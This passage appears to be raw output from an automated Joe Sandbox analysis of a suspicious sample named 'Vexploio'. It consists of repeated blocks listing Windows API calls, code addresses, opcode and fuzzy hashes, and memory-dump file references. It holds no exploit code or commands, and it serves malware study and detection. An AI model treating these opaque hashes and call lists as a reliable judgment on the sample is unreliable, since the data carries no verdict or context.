                              • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                              • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                              • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                              • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                              APIs
                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                              • malloc.MSVCRT ref: 00417407
                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                              • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ByteCharMultiWide$??3@malloc
                              • String ID:
                              • API String ID: 4284152360-0
                              • Opcode ID: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                              • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                              • Opcode Fuzzy Hash: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                              • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                              APIs
                              • memset.MSVCRT ref: 0040F673
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                              • strlen.MSVCRT ref: 0040F6A2
                              • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                              • String ID:
                              • API String ID: 2754987064-0
                              • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                              • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                              • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                              • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                              APIs
                              • memset.MSVCRT ref: 0040F6E2
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                              • strlen.MSVCRT ref: 0040F70D
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                              • String ID:
                              • API String ID: 2754987064-0
                              • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                              • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                              • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                              • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                              APIs
                              • memset.MSVCRT ref: 00402FD7
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                              • strlen.MSVCRT ref: 00403006
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                              • String ID:
                              • API String ID: 2754987064-0
                              • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                              • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                              • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                              • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                              APIs
                                • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                              • SetBkMode.GDI32(?,00000001), ref: 004143A2
                              • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                              • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                              • GetStockObject.GDI32(00000000), ref: 004143C6
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                              • String ID:
                              • API String ID: 764393265-0
                              • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                              • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                              • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                              • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                              APIs
                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: Time$System$File$LocalSpecific
                              • String ID:
                              • API String ID: 979780441-0
                              • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                              • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                              • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                              • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                              APIs
                              • memcpy.MSVCRT ref: 004134E0
                              • memcpy.MSVCRT ref: 004134F2
                              • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                              • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcpy$DialogHandleModuleParam
                              • String ID:
                              • API String ID: 1386444988-0
                              • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                              • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                              • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                              • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                              APIs
                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                              • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: InvalidateMessageRectSend
                              • String ID: d=E
                              • API String ID: 909852535-3703654223
                              • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                              • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                              • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                              • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                              APIs
                              • wcschr.MSVCRT ref: 0040F79E
                              • wcschr.MSVCRT ref: 0040F7AC
                                • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: wcschr$memcpywcslen
                              • String ID: "
                              • API String ID: 1983396471-123907689
                              • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                              • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                              • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                              • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                              APIs
                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                              • _memicmp.MSVCRT ref: 0040C00D
                              • memcpy.MSVCRT ref: 0040C024
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: FilePointer_memicmpmemcpy
                              • String ID: URL
                              • API String ID: 2108176848-3574463123
                              • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                              • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                              • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                              • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: _snwprintfmemcpy
                              • String ID: %2.2X
                              • API String ID: 2789212964-323797159
                              • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                              • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                              • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                              • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: _snwprintf
                              • String ID: %%-%d.%ds
                              • API String ID: 3988819677-2008345750
                              • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                              • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                              • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                              • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                              APIs
                              • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                              • memset.MSVCRT ref: 00401917
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: PlacementWindowmemset
                              • String ID: WinPos
                              • API String ID: 4036792311-2823255486
                              • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                              • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                              • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                              • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                              APIs
                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                              • wcsrchr.MSVCRT ref: 0040DCE9
                              • wcscat.MSVCRT ref: 0040DCFF
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: FileModuleNamewcscatwcsrchr
                              • String ID: _lng.ini
                              • API String ID: 383090722-1948609170
                              • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                              • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                              • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                              • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                              APIs
                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                              • String ID: SHGetSpecialFolderPathW$shell32.dll
                              • API String ID: 2773794195-880857682
                              • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                              • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                              • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                              • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                              APIs
                              • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                              • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: LongWindow
                              • String ID: MZ@
                              • API String ID: 1378638983-2978689999
                              • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                              • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                              • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                              • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcpy$memset
                              • String ID:
                              • API String ID: 438689982-0
                              • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                              • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                              • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                              • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??2@$memset
                              • String ID:
                              • API String ID: 1860491036-0
                              • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                              • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                              • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                              • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                              APIs
                              • memcmp.MSVCRT ref: 00408AF3
                                • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                              • memcmp.MSVCRT ref: 00408B2B
                              • memcmp.MSVCRT ref: 00408B5C
                              • memcpy.MSVCRT ref: 00408B79
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcmp$memcpy
                              • String ID:
                              • API String ID: 231171946-0
                              • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                              • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                              • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                              • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: wcslen$wcscat$wcscpy
                              • String ID:
                              • API String ID: 1961120804-0
                              • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                              • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                              • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                              • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E